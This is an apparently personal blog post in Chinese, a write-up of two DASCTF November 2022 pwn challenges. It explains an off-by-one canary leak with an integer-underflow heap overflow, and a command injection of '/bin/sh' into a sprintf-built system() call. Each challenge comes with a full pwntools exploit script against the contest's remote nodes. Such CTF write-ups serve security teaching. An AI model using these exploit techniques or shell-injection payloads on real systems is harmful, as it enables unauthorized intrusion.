<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0,viewport-fit=cover"><title>DASCTF NOV 2022 WP | 133NSON's space</title><meta name="author" content="133NSON"><meta name="copyright" content="133NSON"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="PWN一开始看 heapmaster 去了，看了半天没打出来，然后快没时间了就只写了个签到题 签个到程序分析程序功能有点类似于一个菜单堆，第一次处理输入的函数存在 off by one 漏洞  菜单提供了两个功能，分别是 add 和 get add 函数中，输入 size 后可以在 malloc 出来的指针上输入 size 个字节，若指针上前4个字节无内容则会将其赋值为 0x886 。 size">
<meta property="og:type" content="article">
<meta property="og:title" content="DASCTF NOV 2022 WP">
<meta property="og:url" content="https://133nson.github.io/2023/04/07/DASCTF-NOV-WP/index.html">
<meta property="og:site_name" content="133NSON&#39;s space">
<meta property="og:description" content="PWN一开始看 heapmaster 去了，看了半天没打出来，然后快没时间了就只写了个签到题 签个到程序分析程序功能有点类似于一个菜单堆，第一次处理输入的函数存在 off by one 漏洞  菜单提供了两个功能，分别是 add 和 get add 函数中，输入 size 后可以在 malloc 出来的指针上输入 size 个字节，若指针上前4个字节无内容则会将其赋值为 0x886 。 size">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://133nson.github.io/img/1.jpg">
<meta property="article:published_time" content="2023-04-07T13:33:07.000Z">
<meta property="article:modified_time" content="2023-04-20T11:43:03.011Z">
<meta property="article:author" content="133NSON">
<meta property="article:tag" content="DASCTF">
<meta property="article:tag" content="writeup">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://133nson.github.io/img/1.jpg"><link rel="shortcut icon" href="/img/website_logo.png"><link rel="canonical" href="https://133nson.github.io/2023/04/07/DASCTF-NOV-WP/index.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox/fancybox.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="/font/logofonts.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: {"appId":"E6F6HJNVKT","apiKey":"b16c6b49a43f4e7a83f8041e6fe7ad46","indexName":"my-hexo-blog","hits":{"per_page":6},"languages":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}.","hits_stats":"${hits} results found in ${time} ms"}},
  localSearch: undefined,
  translate: {"defaultEncoding":2,"translateDelay":0,"msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"簡"},
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: 'days',
  date_suffix: {
    just: 'Just',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false,
  percent: {
    toc: true,
    rightside: false,
  }
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'DASCTF NOV 2022 WP',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2023-04-20 19:43:03'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
    win.getCSS = (url,id = false) => new Promise((resolve, reject) => {
      const link = document.createElement('link')
      link.rel = 'stylesheet'
      link.href = url
      if (id) link.id = id
      link.onerror = reject
      link.onload = link.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        link.onload = link.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(link)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><link rel="stylesheet" href="/css/font.css"><script src="/js/sakura.js"></script><meta name="generator" content="Hexo 6.3.0"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/1.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">17</div></a><a href="/tags/"><div class="headline">Tags</div><div class="length-num">8</div></a><a href="/categories/"><div class="headline">Categories</div><div class="length-num">1</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw iconfont icon-article"></i><span> Articles</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></li><li><a class="site-page child" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></li><li><a class="site-page child" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw iconfont icon-about"></i><span> About</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('/img/yukino.png')"><nav id="nav"><span id="blog-info"><a href="/" title="133NSON's space"><span class="site-name">133NSON's space</span></a></span><div id="menus"><div id="search-button"><a class="site-page social-icon search" href="javascript:void(0);"><i class="fas fa-search fa-fw"></i><span> Search</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw iconfont icon-article"></i><span> Articles</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></li><li><a class="site-page child" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> Tags</span></a></li><li><a class="site-page child" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw iconfont icon-about"></i><span> About</span></a></div></div><div id="toggle-menu"><a class="site-page" href="javascript:void(0);"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">DASCTF NOV 2022 WP</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">Created</span><time class="post-meta-date-created" datetime="2023-04-07T13:33:07.000Z" title="Created 2023-04-07 21:33:07">2023-04-07</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">Updated</span><time class="post-meta-date-updated" datetime="2023-04-20T11:43:03.011Z" title="Updated 2023-04-20 19:43:03">2023-04-20</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/CTF/">CTF</a></span></div><div class="meta-secondline"></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h1 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h1><p>一开始看 <code>heapmaster</code> 去了，看了半天没打出来，然后快没时间了就只写了个签到题</p>
<h2 id="签个到"><a href="#签个到" class="headerlink" title="签个到"></a>签个到</h2><h3 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h3><p>程序功能有点类似于一个菜单堆，第一次处理输入的函数存在 <code>off by one</code> 漏洞</p>
<p><img src="/2023/04/07/DASCTF-NOV-WP/signin1.png"></p>
<p>菜单提供了两个功能，分别是 <code>add</code> 和 <code>get</code></p>
<p><code>add</code> 函数中，输入 <code>size</code> 后可以在 <code>malloc</code> 出来的指针上输入 <code>size</code> 个字节，若指针上前4个字节无内容则会将其赋值为 <code>0x886</code> 。 <code>size</code> 的值不能超过 <code>0x10</code>，即正常情况下最多只能输入10个字节大小的 <code>content</code> 。然而，在输入 <code>content</code> 时调用的处理输入函数中，判断输入数据界限的条件为 <code>&lt;= size - 1</code> ，所以当 <code>size == 0</code> ，即 <code>(size - 1) == 0xffffffffffffffff</code> ，可以绕过检查输入超出预期的内容导致堆溢出</p>
<p><img src="/2023/04/07/DASCTF-NOV-WP/signin2.png"></p>
<p><img src="/2023/04/07/DASCTF-NOV-WP/signin3.png"></p>
<p><code>get</code> 函数中，会以输入的8个字节数据为key，遍历储存指针的数组。若当前下标对应指针上第5~13字节的数据等于输入的key，第1~9字节的数据等于 <code>canary</code> ，则会调用 <code>backdoor</code> 来 <code>getshell</code></p>
<p><img src="/2023/04/07/DASCTF-NOV-WP/signin4.png"></p>
<h3 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h3><p>利用一开始的 <code>off by one</code> 泄露 <code>canary</code>， <code>add</code> 中的堆溢出将 <code>canary</code> 的值提前布置在 <code>top_chunk</code> 的 <code>mem</code> 上，再申请一个 <code>chunk</code> ，此时该 <code>chunk</code> 上的内容就是 <code>canary</code> ，可以绕过 <code>add</code> 中对指针前4字节是否为0的判断，然后在该指针的第5~13字节上的内容写入 <code>canary</code> 的后4个字节和4个 <code>&#39;\x00&#39;</code> ，这样在 <code>get</code> 中输入 <code>canary</code> 的后4个字节作为 <code>key</code> 在遍历到对应的指针时就可以同时满足两个 <code>strncmp</code> 的判断从而去调用 <code>backdoor</code> 函数</p>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python2</span></span><br><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment"># io = process(&#x27;./pwn_5&#x27;)</span></span><br><span class="line">io = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="number">28969</span>)</span><br><span class="line"></span><br><span class="line">context.binary = <span class="string">&#x27;pwn_5&#x27;</span></span><br><span class="line"></span><br><span class="line">rc          = <span class="keyword">lambda</span> n          : io.recv(n)</span><br><span class="line">ru          = <span class="keyword">lambda</span> x          : io.recvuntil(x, drop = <span class="literal">True</span>)</span><br><span class="line">sa          = <span class="keyword">lambda</span> a, b       : io.sendafter(a, b)</span><br><span class="line">sla         = <span class="keyword">lambda</span> a, b       : io.sendlineafter(a, b)</span><br><span class="line">ia          = <span class="keyword">lambda</span>            : io.interactive()</span><br><span class="line">uu64        = <span class="keyword">lambda</span> x          : u64(x.ljust(<span class="number">8</span>, <span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line">lg          = <span class="keyword">lambda</span> x          : info(<span class="string">&#x27;\x1b[01;38;5;214m %s --&gt; 0x%x \033[0m&#x27;</span> % (x, <span class="built_in">eval</span>(x)))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">menu</span>(<span class="params">choice</span>):</span><br><span class="line">    sla(<span class="string">&#x27;&gt; &#x27;</span>, <span class="built_in">str</span>(choice))</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">size, content</span>):</span><br><span class="line">    menu(<span class="number">1</span>)</span><br><span class="line">    sla(<span class="string">&#x27;power length: &#x27;</span>, <span class="built_in">str</span>(size))</span><br><span class="line">    sa(<span class="string">&#x27;name: &#x27;</span>, content)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get</span>(<span class="params">content</span>):</span><br><span class="line">    menu(<span class="number">2</span>)</span><br><span class="line">    sa(<span class="string">&#x27;data: &#x27;</span>, content)</span><br><span class="line"></span><br><span class="line">sa(<span class="string">&#x27;who are u?\n&#x27;</span>, <span class="string">&#x27;a&#x27;</span> * <span class="number">9</span>)</span><br><span class="line">ru(<span class="string">&#x27;a&#x27;</span> * <span class="number">8</span>)</span><br><span class="line">canary = uu64(rc(<span class="number">8</span>)) - <span class="number">0x61</span></span><br><span class="line">lg(<span class="string">&#x27;canary&#x27;</span>)</span><br><span class="line">pld = flat(&#123;</span><br><span class="line">    <span class="number">0x18</span> - <span class="number">4</span>: [</span><br><span class="line">        <span class="number">0x20d51</span>,</span><br><span class="line">        canary,</span><br><span class="line">        <span class="string">&#x27;\n&#x27;</span></span><br><span class="line">    ]</span><br><span class="line">&#125;, filler = <span class="string">&#x27;\x00&#x27;</span>)</span><br><span class="line">add(<span class="number">0</span>, pld)</span><br><span class="line">add(<span class="number">0</span>, p64(canary)[-<span class="number">4</span>:] + <span class="string">&#x27;\x00&#x27;</span> * <span class="number">4</span> + <span class="string">&#x27;\n&#x27;</span>)</span><br><span class="line">get(p64(canary)[-<span class="number">4</span>:] + <span class="string">&#x27;\x00&#x27;</span> * <span class="number">4</span>)</span><br><span class="line">ia()</span><br></pre></td></tr></table></figure>

<p><img src="/2023/04/07/DASCTF-NOV-WP/signin5.png"></p>
<h2 id="login"><a href="#login" class="headerlink" title="login"></a>login</h2><h3 id="程序分析-1"><a href="#程序分析-1" class="headerlink" title="程序分析"></a>程序分析</h3><p><code>main</code> 函数这个位置有一条花指令需要patch掉</p>
<p><img src="/2023/04/07/DASCTF-NOV-WP/login1.png"></p>
<p>程序会对输入的数据进行序列化</p>
<h3 id="利用思路-1"><a href="#利用思路-1" class="headerlink" title="利用思路"></a>利用思路</h3><p>洞在这个位置</p>
<p><img src="/2023/04/07/DASCTF-NOV-WP/login2.png"></p>
<p><code>set_sys_adm</code> 函数会将输入数据继续序列化，然后调用 <code>sprintf</code> 函数将两个序列化后的数据格式化输出到函数内的一个数组上，并且以这个数组作为参数调用 <code>system</code> 函数</p>
<p><img src="/2023/04/07/DASCTF-NOV-WP/login3.png"></p>
<p>因为输入的数据是可控的，序列化后的数据是由输入的数据控制的，所以可以在这里构造出 <code>system(&quot;/bin/sh&quot;)</code> 的调用来 <code>getshell</code></p>
<h3 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python2</span></span><br><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment"># io = process(&#x27;./pwn_4&#x27;)</span></span><br><span class="line">io = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="number">27036</span>)</span><br><span class="line"></span><br><span class="line">context.binary = <span class="string">&#x27;pwn_4&#x27;</span></span><br><span class="line"></span><br><span class="line">sa          = <span class="keyword">lambda</span> a, b       : io.sendafter(a, b)</span><br><span class="line">ia          = <span class="keyword">lambda</span>            : io.interactive()</span><br><span class="line"></span><br><span class="line">pld = flat([</span><br><span class="line">    <span class="string">&#x27;POST/set_sys_adm \r\n&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;=;/bin/sh;&amp;=junk&amp;&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;EOF&#x27;</span></span><br><span class="line">])</span><br><span class="line">sa(<span class="string">&#x27;welcome to login! \n&#x27;</span>, pld)</span><br><span class="line">ia()</span><br></pre></td></tr></table></figure>

<p><img src="/2023/04/07/DASCTF-NOV-WP/login4.png"></p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="https://133nson.github.io">133NSON</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="https://133nson.github.io/2023/04/07/DASCTF-NOV-WP/">https://133nson.github.io/2023/04/07/DASCTF-NOV-WP/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/DASCTF/">DASCTF</a><a class="post-meta__tags" href="/tags/writeup/">writeup</a></div><div class="post_share"><div class="social-share" data-image="/img/1.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2023/04/05/VNCTF2023-PWN-WP/" title="VNCTF 2023 WP"><div class="cover" style="background: var(--default-bg-color)"></div><div class="pagination-info"><div class="label">Previous Post</div><div class="prev_info">VNCTF 2023 WP</div></div></a></div><div class="next-post pull-right"><a href="/2023/04/11/Midnight-Sun-CTF-2023/" title="Midnight Sun CTF 2023 WP"><div class="cover" style="background: var(--default-bg-color)"></div><div class="pagination-info"><div class="label">Next Post</div><div class="next_info">Midnight Sun CTF 2023 WP</div></div></a></div></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/1.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">133NSON</div><div class="author-info__description"></div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">17</div></a><a href="/tags/"><div class="headline">Tags</div><div class="length-num">8</div></a><a href="/categories/"><div class="headline">Categories</div><div class="length-num">1</div></a></div><div class="card-info-social-icons is-center"><a class="social-icon" href="mailto:benson12385@gmail.com" target="_blank" title="Email"><i class="fas fa-envelope"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>Announcement</span></div><div class="announcement_content">Welcome to contact me via email~</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>Catalog</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#PWN"><span class="toc-number">1.</span> <span class="toc-text">PWN</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AD%BE%E4%B8%AA%E5%88%B0"><span class="toc-number">1.1.</span> <span class="toc-text">签个到</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%A8%8B%E5%BA%8F%E5%88%86%E6%9E%90"><span class="toc-number">1.1.1.</span> <span class="toc-text">程序分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF"><span class="toc-number">1.1.2.</span> <span class="toc-text">利用思路</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#exp"><span class="toc-number">1.1.3.</span> <span class="toc-text">exp</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#login"><span class="toc-number">1.2.</span> <span class="toc-text">login</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%A8%8B%E5%BA%8F%E5%88%86%E6%9E%90-1"><span class="toc-number">1.2.1.</span> <span class="toc-text">程序分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%9D%E8%B7%AF-1"><span class="toc-number">1.2.2.</span> <span class="toc-text">利用思路</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#exp-1"><span class="toc-number">1.2.3.</span> <span class="toc-text">exp</span></a></li></ol></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>Recent Post</span></div><div class="aside-list"><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2023/10/16/MapleCTF2023/" title="MapleCTF 2023 lost-in-space">MapleCTF 2023 lost-in-space</a><time datetime="2023-10-16T02:32:13.000Z" title="Created 2023-10-16 10:32:13">2023-10-16</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2023/10/16/xsb2023/" title="香山杯 2023 PWN">香山杯 2023 PWN</a><time datetime="2023-10-16T02:13:06.000Z" title="Created 2023-10-16 10:13:06">2023-10-16</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2023/10/12/blb2023/" title="柏鹭杯 2023 PWN">柏鹭杯 2023 PWN</a><time datetime="2023-10-11T16:08:28.000Z" title="Created 2023-10-12 00:08:28">2023-10-12</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2023/09/27/hitcon2023/" title="HITCON CTF 2023 SUBformore">HITCON CTF 2023 SUBformore</a><time datetime="2023-09-27T10:32:59.000Z" title="Created 2023-09-27 18:32:59">2023-09-27</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2023/07/31/tfc2023/" title="TFC CTF 2023 INJ">TFC CTF 2023 INJ</a><time datetime="2023-07-31T03:39:13.000Z" title="Created 2023-07-31 11:39:13">2023-07-31</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2023 By 133NSON</div><div class="framework-info"><span>Framework </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>Theme </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div><div class="footer_custom_text">The sky above the port was the color of television, tuned to a dead channel.</div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="translateLink" type="button" title="Switch Between Traditional Chinese And Simplified Chinese">繁</button><button id="darkmode" type="button" title="Switch Between Light And Dark Mode"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="Toggle between single-column and double-column"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="Setting"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="Table Of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back To Top"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox/fancybox.umd.min.js"></script><div class="js-pjax"></div><div id="algolia-search"><div class="search-dialog"><nav class="search-nav"><span class="search-dialog-title">Search</span><button class="search-close-button"><i class="fas fa-times"></i></button></nav><div class="search-wrap"><div id="algolia-search-input"></div><hr/><div id="algolia-search-results"><div id="algolia-hits"></div><div id="algolia-pagination"></div><div id="algolia-info"><div class="algolia-stats"></div><div class="algolia-poweredBy"></div></div></div></div></div><div id="search-mask"></div><script src="https://cdn.jsdelivr.net/npm/algoliasearch/dist/algoliasearch-lite.umd.min.js"></script><script src="https://cdn.jsdelivr.net/npm/instantsearch.js/dist/instantsearch.production.min.js"></script><script src="/js/search/algolia.js"></script></div></div></body></html>